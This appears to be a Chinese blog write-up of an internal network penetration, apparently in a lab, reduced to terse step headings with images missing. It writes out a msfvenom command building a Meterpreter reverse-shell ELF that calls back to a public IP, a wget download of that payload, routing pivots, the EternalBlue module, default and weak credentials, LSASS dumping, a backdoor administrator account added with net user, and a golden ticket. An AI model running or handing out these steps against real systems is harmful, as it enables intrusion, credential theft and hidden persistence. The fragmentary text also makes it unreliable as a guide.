一次内网渗透的经历
msf对kali上马
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=8.152.213.83 lport=7997 -f elf -o nw40

把木马移动到网页
cp nw40 /usr/share/nginx/html/www.test.com
kali通过weget下发木马
wget http://8.152.213.83/nw40

授予木马执行权限
chmod +x nw40.1
msf监听

搭建sock隧道
run autoroute -s 192.168.4.0
run autoroute -p




成功把私网的kali穿透到公网了

备注:如果想关闭sock代理,使用jobs -k
nmap
-sn 进行主机发现,


fscan


发现永恒之蓝了

exploit/windows/smb/ms17_010_eternalblue

信息收集

进行进程迁移,持久化

迁移到lsass.exe

15

19
vnc

20


41

发现ssh弱口令

登录成功了

209


密码爆破出来了,登录

http


远程代码执行


php木马



上马


发现架构是x86

shell拿到了

telnet
msfadmin/msfadmin

登录
telnet 192.168.4.209

nfs

postsql
postgres:postgres@template1


ftp
use auxiliary/scanner/ftp/ftp_version
set rhosts 192.168.4.209


获得shell了

171
发现ms17-010

信息收集

发现域


域控

发现域内在线主机

procdump










修改注册表开启3389


创建后门用户
net user hacker hacker@123456 /add
net localgroup administrators hacker /add
msf17-010拿下域控

持久化

信息收集






黄金票据



保存黄金票据到本地


在域用户使用




上线cs


迁移进程到svchost.exe

222


239



245

246

247


浙公网安备 33010602011771号